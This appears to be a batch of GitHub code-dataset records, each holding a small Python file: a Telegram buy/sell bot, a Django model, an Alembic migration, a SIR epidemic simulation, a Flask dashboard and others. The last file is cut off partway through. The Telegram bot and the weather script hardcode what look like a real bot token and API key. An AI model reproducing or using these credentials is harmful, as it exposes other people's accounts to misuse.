steps_per_epoch=_Training_Params.steps_per_epoch // epoch_factor,\n validation_data=_Training_Params.validation_data,\n validation_steps=_Training_Params.validation_steps // epoch_factor,\n callbacks=__callbacks_list,\n workers=_Training_Params.workers)\n\n logger.debug(\"Save Final Training Values\")\n __model.save(__result_weight_path)\n\n # logger.debug(\"Save History as Plot\")\n # __history_name = utils.file_name_generator(identification='result', title='histogram', extension='png')\n # __history_log_path = os.path.join(__base_path, __history_name)\n # history_save(__history_transfer, __history_log_path)\n\n scores = __model.evaluate_generator(__test_generator,\n steps=_Training_Params.validation_steps // epoch_factor,\n use_multiprocessing=False)\n logger.info(\"Accuracy: %.2f%%\" % (scores[1] * 100))\n logger.debug(\"Training End\")\n\n return True\n","repo_name":"sulpago/ML-Demo-Site","sub_path":"machine/machine_teacher.py","file_name":"machine_teacher.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10049560633","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @File: async_demo.py\n# @Author: dell\n# @Date: 2020/10/26 16:08\n# @Desc: \n# @Project: licode\n# @Source: PyCharm\n\n\nimport asyncio\nimport threading\n\n\nasync def hello():\n print('Hello world! (%s)' % threading.currentThread())\n await asyncio.sleep(1)\n print('Hello again! (%s)' % threading.currentThread())\n\n\nloop = asyncio.get_event_loop()\n\ntasks = [hello(), hello()]\n\nloop.run_until_complete(asyncio.wait(tasks))\n\nloop.close()","repo_name":"freechenh/licode","sub_path":"day15/async_demo.py","file_name":"async_demo.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74300639091","text":"import telebot\nimport sqlite3\nfrom telebot import types\n\nbot = telebot.TeleBot(\"1176972608:AAHcIepUT9iM7Pi6H2cBv3KO3bwXRkh1gK0\")\nconn = sqlite3.connect(\"inventory.db\")\n\ndef create_table():\n conn.execute(\"CREATE TABLE IF NOT EXISTS items (item TEXT, price INTEGER)\")\n\n@bot.message_handler(commands=['start'])\ndef start_handler(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True, selective=True)\n markup.add(\"Buy Item\", \"Sell Item\")\n bot.send_message(chat_id=message.from_user.id, text=\"Welcome! Choose an option.\", reply_markup=markup)\n\n@bot.message_handler(func=lambda message: message.text == \"Buy Item\")\ndef buy_handler(message):\n bot.send_message(chat_id=message.from_user.id, text=\"Which item would you like to buy?\")\n\n@bot.message_handler(func=lambda message: message.text == \"Sell Item\")\ndef sell_handler(message):\n bot.send_message(chat_id=message.from_user.id, text=\"What is the name and price of the item you want to sell?\")\n\n@bot.message_handler(func=lambda message: \"buy\" in message.text.lower())\ndef buy_confirm_handler(message):\n parts = message.text.split(\" \")\n item = parts[1]\n cursor = conn.execute(\"SELECT price FROM items WHERE item=?\", (item,))\n row = cursor.fetchone()\n\n if row is None:\n bot.send_message(chat_id=message.from_user.id, text=\"Item not found.\")\n else:\n price = row[0]\n bot.send_message(chat_id=message.from_user.id, text=\"Item found for {} coins. Do you want to buy it?\".format(price))\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True, selective=True)\n markup.add(\"Yes\", \"No\")\n bot.send_message(chat_id=message.from_user.id, text=\"Do you want to buy it?\", reply_markup=markup)\n\n@bot.message_handler(func=lambda message: \"sell\" in message.text.lower())\ndef sell_confirm_handler(message):\n parts = message.text.split(\" \")\n item = parts[1]\n price = parts[2]\n\n conn.execute(\"INSERT INTO items (item, price) VALUES (?, ?)\", (item, price))\n conn.commit()\n\n bot.send_message(chat_id=message.from_user.id, text=\"Item sold.\")\n\ncreate_table()\nbot.polling()\n","repo_name":"daliroff/Telegram","sub_path":"tgbot.py","file_name":"tgbot.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37448851452","text":"from django.db import models\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nclass Jasoseol(models.Model): #models.Model을 상속 받아서 Jasoseol 모델 제작(첫글자 대문자)\n title = models.CharField(max_length=50) #제목에 짧은 문자열(50자 제한 필수)\n content = models.TextField() #내용에 긴 문자열 입력 가능\n undated_at = models.DateTimeField(auto_now=True) #날짜와 시간을 받을 수 있게함(자동 업데이트 저장)\n author = models.ForeignKey(User, on_delete=models.CASCADE) #FK로 연결로 객체를 지움\n\nclass Comment(models.Model): #models.Model을 상속 받아 Comment 모델 제작(첫글자 대문자)\n content = models.CharField(max_length=100) #내용에 짧은 문자열 100자 이내\n author = models.ForeignKey(User, on_delete=models.CASCADE) #FK로 연결로 객체를 지움(이용자)\n jasoseol = models.ForeignKey(Jasoseol, on_delete=models.CASCADE) #FK로 연결로 객체를 지움(자소서)","repo_name":"Jaejuneeyo/DJANGO-JssProject","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43893620701","text":"\"\"\"add index on auth_token session_uuid\n\nRevision ID: 6834e544e667\nRevises: 6ab0ef651dcd\n\n\"\"\"\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '6834e544e667'\ndown_revision = '6ab0ef651dcd'\n\n\ndef upgrade():\n # What we should be careful of: some production systems already have the index in place\n # since it was fixed by support\n idx_to_rename = {\n 'auth_token_session_uuid_idx': 'auth_token__idx__session_uuid',\n }\n conn = op.get_bind()\n for idx, idx_renamed in idx_to_rename.items():\n conn.execute(f'ALTER INDEX IF EXISTS {idx} RENAME TO {idx_renamed};')\n\n conn.execute(\n 'CREATE INDEX IF NOT EXISTS auth_token__idx__session_uuid ON auth_token (session_uuid);'\n )\n\n\ndef downgrade():\n op.drop_index('auth_token__idx__session_uuid')\n","repo_name":"wazo-platform/wazo-auth","sub_path":"wazo_auth/database/alembic/versions/6834e544e667_add_index_on_auth_token_session_uuid.py","file_name":"6834e544e667_add_index_on_auth_token_session_uuid.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"74268932853","text":"def sort_word(word):\n char_count = [0] * 256\n for char in word:\n char_count[ord(char)] += 1\n\n for i in range(1, 256):\n char_count[i] += char_count[i-1]\n\n result = [None] * len(word)\n for char in word:\n result[char_count[ord(char)] - 1] = char\n char_count[ord(char)] -= 1\n\n return ''.join(result)\n\n\ndef is_anagram(first_string, second_string):\n if not first_string and not second_string:\n return (first_string, second_string, False)\n\n first_string = first_string.lower().replace(\" \", \"\")\n second_string = second_string.lower().replace(\" \", \"\")\n\n first_string_sorted = sort_word(first_string)\n second_string_sorted = sort_word(second_string)\n\n if first_string_sorted == second_string_sorted:\n return (first_string_sorted, second_string_sorted, True)\n else:\n return (first_string_sorted, second_string_sorted, False)\n","repo_name":"Edson1206/project-algorithms","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17159128507","text":"import requests\n\napi_key = \"0505751a83b53a0600c6fa19bbb62039\"\ncity = \"Orlando\"\nurl = \"http://api.openweathermap.org/data/2.5/weather?q=\"+city+\"&appid=\"+api_key+\"&units=imperial\"\n\nrequest = requests.get(url)\njson = request.json()\n# print(json)\n\ndescription = json.get(\"weather\")[0].get(\"description\")\nprint(\"Today's forecast is\", description)\n\ntemp_min = json.get(\"main\").get(\"temp_min\")\nprint(\"The minimun temperature is\", temp_min)\ntemp_max = json.get(\"main\").get(\"temp_max\")\nprint(\"The maxium temperature is\", temp_max)\n","repo_name":"TateMerrill/practical-python","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6065950399","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 22 18:22:32 2021\n\n@author: changkai\n\"\"\"\n\nimport numpy as np\nimport scipy.sparse as sp\nimport scipy.sparse.linalg as spla\nfrom Regions import Regions\nfrom Region_SIR import RGN_SIR\nimport itertools as it\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nclass SIR(Regions):\n \n # outflow coefficients\n # returns a dictionary with region names being the keys\n def OFC(self, dict_):\n mc = self.mobilityCoef(dict_)\n keyMat = self.keyMat()\n n = len(self.regions)\n ofc = {}\n for i in range(n):\n tempCS = 0\n tempCI = 0\n tempCR = 0\n for j in range(n):\n if i != j:\n key = keyMat[i,j]\n tempCS = tempCS + mc[key][3]\n tempCI = tempCI + mc[key][4]\n tempCR = tempCR + mc[key][5]\n\n name = self.regions[i].name\n ofc[name] = [tempCS, tempCI, tempCR]\n \n return ofc\n \n # build diagonal blocks\n def diagBlock(self, dict_, idx):\n ofc = self.OFC(dict_)\n name = self.regions[idx].name\n curOFC = ofc[name]\n curOFC = [-1 * item for item in curOFC] # take the negative value\n block = sp.diags(curOFC, 0, shape=[3,3], format = 'csr')\n \n return block\n \n # build a 3x3 block matrix\n def Block(self, dict_, row, col):\n mc = self.mobilityCoef(dict_)\n keyMat = self.keyMat()\n if row == col:\n block = self.diagBlock(dict_, row)\n else:\n key = keyMat[row, col]\n tempCoef = mc[key]\n block = sp.diags(tempCoef[0:3], 0, shape=[3,3], format='csr')\n return block\n \n # the linear matrix\n def AL(self, dict_):\n n = len(self.regions)\n row1 = self.Block(dict_, 0, 0) \n \n for col in range(1,n):\n tempBlock = self.Block(dict_, 0, col)\n row1 = sp.hstack([row1, tempBlock])\n \n Al = row1\n for row in range(1,n):\n tempRow = self.Block(dict_, row, 0)\n for col in range(1,n):\n tempBlock = self.Block(dict_, row, col)\n tempRow = sp.hstack([tempRow, tempBlock])\n Al = sp.vstack([Al, tempRow])\n \n return Al\n \n # u is of shape (m,1); numpy array\n # return the dictionary containing the nonlinear terms of each region\n # in the order of S, I, R\n # def NLC(self, u):\n # nlc = {}\n # n = len(self.regions)\n # ut = u\n # m = ut.shape[0]\n # ut = ut.reshape(1,m).squeeze()\n # ut = ut.tolist()\n # for i in range(n):\n # name = self.regions[i].name\n # nlc[name] = ut[3*i:(3*(i+1))]\n # return nlc\n \n # return the nonlinear matrix (depending on u)\n def ANL(self, u):\n \n n = len(self.regions)\n B0 = sp.diags([0.], shape=[3, 3], format = 'csr') # zero block\n \n ut = u.reshape(1,3*n).squeeze()\n ut = ut.tolist()\n \n # the first row\n region1 = self.regions[0]\n S1, I1, R1 = ut[0:3]\n c1 = [-region1.beta*I1/region1.N, region1.beta*S1/region1.N-region1.gamma, 0]\n row1 = sp.diags(c1, 0, shape = [3,3], format = 'csr')\n row1[2,1] = region1.gamma\n for i in range(1,n):\n row1 = sp.hstack([row1, B0])\n\n # initialize the resultant matrix with the first row\n Anl = row1\n \n # loop over rows\n for i in range(1,n):\n # the first block of tempRow is a zero block\n tempRow = B0\n \n # stack each column\n for j in range(1,n):\n if i == j:\n region = self.regions[i]\n S, I, R = ut[3*i:3*(i+1)]\n c = [-region.beta*I/region.N, region.beta*S/region.N-region.gamma, 0]\n tempBlock = sp.diags(c, 0, shape = [3,3], format = 'csr')\n tempBlock[2,1] = region.gamma\n else:\n tempBlock = B0\n tempRow = sp.hstack([tempRow, tempBlock])\n \n # stack each row\n Anl = sp.vstack([Anl, tempRow])\n \n return Anl\n \n def Heun(self, dict_, dt, Tf, Ti=0):\n \n # define problem\n n = int((Tf - Ti)/dt)\n u0 = self.u0()\n Al = self.AL(dict_)\n Anl = self.ANL(u0)\n Au = Al + Anl\n u = u0\n # matrix that stores result\n U = u \n for i in range(n):\n \n # predictor\n up = (dt*Au).dot(u)\n \n # corrector\n u = u + dt/2*(Au.dot(u) + Au.dot(up))\n \n # append result\n U = np.append(U, u, axis=1)\n \n # update ANL\n Anl = self.ANL(u)\n \n # update Au\n Au = Al + Anl\n \n return U\n \n def plot_Heun(self, dict_, index, dt, Tf, Ti=0, save = False):\n U = self.Heun(dict_, dt, Tf)\n n = int((Tf-Ti)/dt)+1\n tvals = np.linspace(Ti, Tf, n)\n fig, ax = plt.subplots()\n\n for j in range(3):\n if j == 0:\n Label = self.regions[index].name + '-S'\n elif j == 1:\n Label = self.regions[index].name + '-I'\n else:\n Label = self.regions[index].name + '-R'\n \n ax.plot(tvals, U[index*3+j,:], label = Label)\n \n ax.legend(loc = 'right')\n plt.show()\n if save:\n filename = self.regions[index].name + '.png'\n fig.savefig(filename)\n \n def plotAll_Heun(self, dict_, dt, Tf, Ti=0):\n U = self.Heun_SIR(dict_, dt, Tf)\n numRegion = len(self.regions)\n n = int((Tf-Ti)/dt)+1\n tvals = np.linspace(Ti, Tf, n)\n fig, ax = plt.subplots()\n for i in range(numRegion):\n for j in range(3):\n if j == 0:\n Label = self.regions[i].name + '-S'\n elif j == 1:\n Label = self.regions[i].name + '-I'\n else:\n Label = self.regions[i].name + '-R'\n \n ax.plot(tvals, U[i,:], label = Label)\n \n ax.legend(loc = 'upper right')\n plt.show()\n \n \n \n \n \n \n \n ","repo_name":"HowardYutingHou/CovidProject","sub_path":"Kai/SIR.py","file_name":"SIR.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37312323185","text":"from glob import glob\r\nimport json\r\n\r\npattern = 'U:/RU Moscow A101 Scandinavia/Stage II/**/DWG/*.dwg'\r\n\r\nfiles = glob(pattern, recursive=True)\r\n\r\nwith open('sisu_scan_out.json', 'wb') as f:\r\n\tdata = {\r\n\t\t'files': files,\r\n\t}\r\n\traw = json.dumps(data, indent=4, ensure_ascii=False)\r\n\tf.write(raw.encode('utf-8'))\r\n","repo_name":"tmshv/sisu","sub_path":"sisu-worker/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42921075495","text":"def estritamente_crescente (lista):\n final = []\n if (len(lista) > 1):\n maior = lista[0]\n final.append(lista[0])\n for e in lista:\n if(e > maior):\n maior = e\n final.append(e)\n return final","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_332/ch51_2019_04_03_15_12_46_358977.py","file_name":"ch51_2019_04_03_15_12_46_358977.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2911328301","text":"import json\n\nclass Request:\n prompt: str = \"\"\n init_image: str = None # base64\n mask: str = None # base64\n num_outputs: int = 1\n num_inference_steps: int = 50\n guidance_scale: float = 7.5\n width: int = 512\n height: int = 512\n seed: int = 42\n prompt_strength: float = 0.8\n # allow_nsfw: bool = False\n precision: str = \"autocast\" # or \"full\"\n save_to_disk_path: str = None\n turbo: bool = True\n use_cpu: bool = False\n use_full_precision: bool = False\n use_face_correction: str = None # or \"GFPGANv1.3\"\n use_upscale: str = None # or \"RealESRGAN_x4plus\" or \"RealESRGAN_x4plus_anime_6B\"\n show_only_filtered_image: bool = False\n\n def json(self):\n return {\n \"prompt\": self.prompt,\n \"num_outputs\": self.num_outputs,\n \"num_inference_steps\": self.num_inference_steps,\n \"guidance_scale\": self.guidance_scale,\n \"width\": self.width,\n \"height\": self.height,\n \"seed\": self.seed,\n \"prompt_strength\": self.prompt_strength,\n \"use_face_correction\": self.use_face_correction,\n \"use_upscale\": self.use_upscale,\n }\n\n def to_string(self):\n return f'''\n prompt: {self.prompt}\n seed: {self.seed}\n num_inference_steps: {self.num_inference_steps}\n guidance_scale: {self.guidance_scale}\n w: {self.width}\n h: {self.height}\n precision: {self.precision}\n save_to_disk_path: {self.save_to_disk_path}\n turbo: {self.turbo}\n use_cpu: {self.use_cpu}\n use_full_precision: {self.use_full_precision}\n use_face_correction: {self.use_face_correction}\n use_upscale: {self.use_upscale}\n show_only_filtered_image: {self.show_only_filtered_image}'''\n\nclass Image:\n data: str # base64\n seed: int\n is_nsfw: bool\n path_abs: str = None\n\n def __init__(self, data, seed):\n self.data = data\n self.seed = seed\n\n def json(self):\n return {\n \"data\": self.data,\n \"seed\": self.seed,\n \"path_abs\": self.path_abs,\n }\n\nclass Response:\n request: Request\n session_id: str\n images: list\n\n def json(self):\n res = {\n \"status\": 'succeeded',\n \"session_id\": self.session_id,\n \"request\": self.request.json(),\n \"output\": [],\n }\n\n for image in self.images:\n res[\"output\"].append(image.json())\n\n return res\n","repo_name":"rcdsp/stable-diffusion-ui","sub_path":"ui/sd_internal/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"34800352770","text":"import Adafruit_DHT\n\nsensor = Adafruit_DHT.DHT11\nDHT_PIN = 4\n\ntry:\n while True:\n shi, wen = Adafruit_DHT.read_retry(sensor, DHT_PIN)\n if shi is not None and wen is not None:\n print(\"Temperature: %.1lf℃\" % wen)\n print(\"Humidity: %.1lf%%\" % shi)\n else:\n print(\"Read Error\")\nfinally:\n print(\"system exit\")","repo_name":"chunzhi23/2021_IoT_RaspberryPi","sub_path":"03_high_level_sensor/dht11.py","file_name":"dht11.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18179340594","text":"import io\nimport json\nimport os\n\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError as GoogleHttpError\nfrom googleapiclient.http import MediaIoBaseUpload\nimport requests\n\nfrom progress_bar import ProgressBar\n\n\nclass GoogleDrive:\n gd_url = ['https://www.googleapis.com/auth/drive'] \n\n def __init__(self):\n self.creds = None\n\n if os.path.exists('token.json'):\n self.creds = Credentials.from_authorized_user_file('token.json', self.gd_url)\n\n if not self.creds or not self.creds.valid:\n if self.creds and self.creds.expired and self.creds.refresh_token:\n self.creds.refresh(Request())\n else:\n self.flow = InstalledAppFlow.from_client_secrets_file(\n './../cred.json', self.gd_url)\n self.creds = self.flow.run_local_server(port=0)\n\n with open('token.json', 'w') as token:\n token.write(self.creds.to_json())\n\n self.service = build('drive', 'v3', credentials=self.creds) \n\n def create_directory_on_google_drive(self, dir_name):\n \"\"\"Сreates a new directory on Google Drive\n\n Keyword Arguments:\n - dir_name -- directory to be created\n\n \"\"\"\n\n try:\n file_metadata = {\n 'name': dir_name,\n 'mimeType': 'application/vnd.google-apps.folder',\n }\n file = self.service.files().create(body=file_metadata,\n fields='id').execute() \n return file.get(\"id\") \n except GoogleHttpError as error:\n print(f'An error occurred: {error}') \n \n def upload_photo_to_google_drive(self, file_path, dir_id, url):\n \"\"\"Uploads a photo to Google Drive\n\n Keyword Arguments:\n - file_path -- path to the file on Google Drive\n - dir_id -- id of the directory in which the files are uploaded\n - url -- link to download file\n\n \"\"\" \n\n vk_image = requests.get(url)\n fh = io.BytesIO()\n fh.write(vk_image.content)\n\n media = MediaIoBaseUpload(fh, mimetype='image/jpg') \n\n file_metadata = { \n 'name' : file_path,\n 'parents': [dir_id]\n }\n\n self.service.files().create(\n body=file_metadata, media_body=media, fields='id').execute()\n\n def parse_vkontakte_response_and_make_backup_photo_on_google_drive(self, resp, dir_id, number_of_photos_to_save=5):\n \"\"\"Uploads a photo to Google Drive\n\n Keyword Arguments:\n - resp -- VKontakte data with photo information\n - dir_name -- directory on Google Drive in which you want to save the photo\n - number_of_photos_to_save - number of saved photos\n\n \"\"\" \n\n prog_bar = ProgressBar()\n prog_bar.printProgressBar(0, len(resp['response']['items']))\n json_result = []\n photos_name = []\n image_type = \"\"\n image_url = \"\"\n\n for i, item in enumerate(resp['response']['items'], 1):\n image_likes = item['likes']['count']\n max_image_size = -1\n for size in item['sizes']:\n image_size = size['height'] + size['width']\n if image_size > max_image_size:\n max_image_size = image_size\n image_url = size['url']\n image_type = size['type'] \n\n json_result.append({'file_name': f'{image_likes}.jpg', 'size': image_type})\n \n if f'{image_likes}.jpg' in photos_name:\n self.upload_photo_to_google_drive(f'{dir_id}/{image_likes}-{item[\"date\"]}.jpg', dir_id, image_url)\n else:\n self.upload_photo_to_google_drive(f'{dir_id}/{image_likes}.jpg', dir_id, image_url)\n photos_name.append(f'{image_likes}.jpg')\n\n if number_of_photos_to_save < len(resp['response']['items']):\n prog_bar.printProgressBar(i, number_of_photos_to_save)\n else:\n prog_bar.printProgressBar(i, len(resp['response']['items']))\n\n if number_of_photos_to_save == i:\n break\n \n if number_of_photos_to_save == i:\n break\n\n with open('result.json', 'w') as file:\n json.dump(json_result, file, indent=4)","repo_name":"GeliosI/CourseWork","sub_path":"src/google_drive.py","file_name":"google_drive.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30539449344","text":"from pathlib import Path\n\nimport numpy as np\n\nfrom py_abm.visualization.parser import ExperimentParser\nfrom py_abm.visualization.plots import Convergence\n\n\ndef create_convergence_graph(results_paths):\n exp_results = []\n rmse_values = []\n\n for path in results_paths:\n exp_results.append(ExperimentParser(path))\n\n for result in exp_results:\n rmse_values.append(np.array([r['RMSE']\n for r in result.best_fitness_per_milestone]))\n\n average_best_fitness = np.mean(rmse_values, axis=0)\n\n plot = Convergence(values=average_best_fitness,\n labels=exp_results[0].milestones)\n return plot\n","repo_name":"moesio-f/py-abm-public","sub_path":"experiments/visualization/convergence.py","file_name":"convergence.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16069057516","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n# from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\ndef main_page(request):\n ouput = '''\n \n \n %s\n \n \n

%s

%s

\n \n \n ''' % ( \n '장고 | 북마크',\n '장고 북마크 웰컴!',\n '북마크 저장해 줘요~'\n )\n\n return HttpResponse(ouput)\n","repo_name":"niceman114/django-test","sub_path":"django_bookmarks/bookmarks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26656058331","text":"# Program file for the Flask server that runs on the\n# Local Operations System\n# ECD109\n# Denis Nakazawa\n\nimport sqlite3\n\nfrom energy_information_database import *\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef render_local_interface():\n time_stamp, real_power_min, real_power_max, real_power_avg, reactive_power_min, reactive_power_max, reactive_power_avg, voltage_min, voltage_max, voltage_avg, current_min, current_max, current_avg, energy = retrieve_last_database_entry()\n \n template_data = {\n 'timeStamp' : time_stamp,\n 'realPowerMin' : real_power_min,\n 'realPowerMax' : real_power_max,\n 'realPowerAvg' : real_power_avg,\n 'reactivePowerMin' : reactive_power_min,\n 'reactivePowerMax' : reactive_power_max,\n 'reactivePowerAvg' : reactive_power_avg,\n 'voltageMin' : voltage_min,\n 'voltageMax' : voltage_max,\n 'voltageAvg' : voltage_avg,\n 'currentMin' : current_min,\n 'currentMax' : current_max,\n 'currentAvg' : current_avg,\n 'energy' : energy\n }\n \n return render_template('index.html', **template_data)\n\nif __name__ == \"__main__\":\n app.run(host = '192.168.1.91', port = 24, debug = True)","repo_name":"StaleGummyBear/ECD310","sub_path":"Remote Source Code/ecd210-rpi-flask-files/flask_server.py","file_name":"flask_server.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4132639746","text":"from .utils_model import *\nMULT = 2\n\n\ndef endpoint_error(\n\t\ty_true: torch.Tensor,\n\t\ty_pred: torch.Tensor,\n\t\tdim: int = 1, ):\n\tepe = torch.linalg.norm(\n\t\ty_true - y_pred, dim=dim)\n\tepe = torch.sum(epe, dim=[1, 2])\n\treturn epe\n\n\ndef endpoint_error_batch(\n\t\ty_true: torch.Tensor,\n\t\ty_pred: torch.Tensor,\n\t\tbatch: int = 512,\n\t\tdim: int = 1, ):\n\tdelta = y_true - y_pred\n\tepe = []\n\tn = int(np.ceil(len(y_true) / batch))\n\tfor i in range(n):\n\t\ta = i * batch\n\t\tb = min((i+1) * batch, len(y_true))\n\t\tepe.append(torch.linalg.norm(\n\t\t\tdelta[range(a, b)], dim=dim,\n\t\t))\n\tepe = torch.cat(epe)\n\tepe = torch.sum(epe, dim=[1, 2])\n\treturn epe\n\n\ndef get_stride(cell_type: str, cmult: int):\n\tstartswith = cell_type.split('_')[0]\n\tif startswith in ['normal', 'combiner']:\n\t\tstride = 1\n\telif startswith == 'down':\n\t\tstride = cmult\n\telif startswith == 'up':\n\t\tstride = -1\n\telse:\n\t\traise NotImplementedError(cell_type)\n\treturn stride\n\n\ndef get_skip_connection(\n\t\tci: int,\n\t\tcmult: int,\n\t\tstride: Union[int, str],\n\t\treg_lognorm: bool = True, ):\n\tif isinstance(stride, str):\n\t\tstride = get_stride(stride, cmult)\n\tif stride == 1:\n\t\treturn nn.Identity()\n\telif stride in [2, 4]:\n\t\treturn FactorizedReduce(\n\t\t\tci=ci,\n\t\t\tco=int(cmult*ci),\n\t\t\treg_lognorm=reg_lognorm,\n\t\t)\n\telif stride == -1:\n\t\treturn nn.Sequential(\n\t\t\tnn.Upsample(\n\t\t\t\tscale_factor=cmult,\n\t\t\t\tmode='nearest'),\n\t\t\tConv2D(\n\t\t\t\tkernel_size=1,\n\t\t\t\tin_channels=ci,\n\t\t\t\tout_channels=int(ci/cmult),\n\t\t\t\treg_lognorm=reg_lognorm),\n\t\t)\n\telse:\n\t\traise NotImplementedError(stride)\n\n\ndef get_act_fn(\n\t\tfn: str,\n\t\tinplace: bool = False,\n\t\t**kwargs, ):\n\tif fn == 'none':\n\t\treturn None\n\telif fn == 'relu':\n\t\treturn nn.ReLU(inplace=inplace)\n\telif fn == 'swish':\n\t\treturn nn.SiLU(inplace=inplace)\n\telif fn == 'elu':\n\t\treturn nn.ELU(inplace=inplace, **kwargs)\n\telif fn == 'softplus':\n\t\treturn nn.Softplus(**kwargs)\n\telse:\n\t\traise NotImplementedError(fn)\n\n\nclass FactorizedReduce(nn.Module):\n\tdef __init__(self, ci: int, co: int, **kwargs):\n\t\tsuper(FactorizedReduce, self).__init__()\n\t\tassert co % 2 == 0 and co > 4\n\t\tco_each = co // 4\n\t\tdefaults = {\n\t\t\t'kernel_size': 1,\n\t\t\t'in_channels': ci,\n\t\t\t'out_channels': co_each,\n\t\t\t'reg_lognorm': True,\n\t\t\t'stride': co // ci,\n\t\t\t'padding': 0,\n\t\t\t'bias': True,\n\t\t}\n\t\tkwargs = setup_kwargs(defaults, kwargs)\n\t\tself.swish = nn.SiLU()\n\t\tself.ops = nn.ModuleList()\n\t\tfor i in range(3):\n\t\t\tself.ops.append(Conv2D(**kwargs))\n\t\tkwargs['out_channels'] = co - 3 * co_each\n\t\tself.ops.append(Conv2D(**kwargs))\n\n\tdef forward(self, x):\n\t\tx = self.swish(x)\n\t\tidx, out = 0, []\n\t\tfor op in self.ops:\n\t\t\ti, j = idx // 2, idx % 2\n\t\t\tout.append(op(x[..., i:, j:]))\n\t\t\tidx += 1\n\t\treturn torch.cat(out, dim=1)\n\n\nclass SELayer(nn.Module):\n\tdef __init__(self, ci: int, reduc: int = 16):\n\t\tsuper(SELayer, self).__init__()\n\t\tself.hdim = max(ci // reduc, 4)\n\t\tself.fc = nn.Sequential(\n\t\t\tnn.Linear(ci, self.hdim), nn.ReLU(inplace=True),\n\t\t\tnn.Linear(self.hdim, ci), nn.Sigmoid(),\n\t\t)\n\n\tdef forward(self, x):\n\t\tb, c, _, _ = x.size()\n\t\tse = torch.mean(x, dim=[2, 3])\n\t\tse = self.fc(se).view(b, c, 1, 1)\n\t\treturn x * se\n\n\nclass Cell(nn.Module):\n\tdef __init__(\n\t\t\tself,\n\t\t\tci: int,\n\t\t\tco: int,\n\t\t\tn_nodes: int,\n\t\t\tcell_type: str,\n\t\t\tact_fn: str,\n\t\t\tuse_bn: bool,\n\t\t\tuse_se: bool,\n\t\t\tscale: float,\n\t\t\teps: float,\n\t\t\t**kwargs,\n\t):\n\t\tsuper(Cell, self).__init__()\n\t\tassert n_nodes >= 1\n\t\tkws_skip = filter_kwargs(\n\t\t\tget_skip_connection, kwargs)\n\t\tself.skip = get_skip_connection(\n\t\t\tci, MULT, cell_type, **kws_skip)\n\t\tself.ops = nn.ModuleList()\n\t\tfor i in range(n_nodes):\n\t\t\top = ConvLayer(\n\t\t\t\tci=ci if i == 0 else co,\n\t\t\t\tco=co,\n\t\t\t\tstride=get_stride(cell_type, MULT)\n\t\t\t\tif i == 0 else 1,\n\t\t\t\tact_fn=act_fn,\n\t\t\t\tuse_bn=use_bn,\n\t\t\t\tinit_scale=scale\n\t\t\t\tif i+1 == n_nodes\n\t\t\t\telse 1.0,\n\t\t\t\t**kwargs,\n\t\t\t)\n\t\t\tself.ops.append(op)\n\t\tif use_se:\n\t\t\tself.se = SELayer(co)\n\t\telse:\n\t\t\tself.se = None\n\t\tself.eps = eps\n\n\tdef forward(self, x):\n\t\tskip = self.skip(x)\n\t\tfor op in self.ops:\n\t\t\tx = op(x)\n\t\tif self.se is not None:\n\t\t\tx = self.se(x)\n\t\treturn skip + self.eps * x\n\n\nclass ConvLayer(nn.Module):\n\tdef 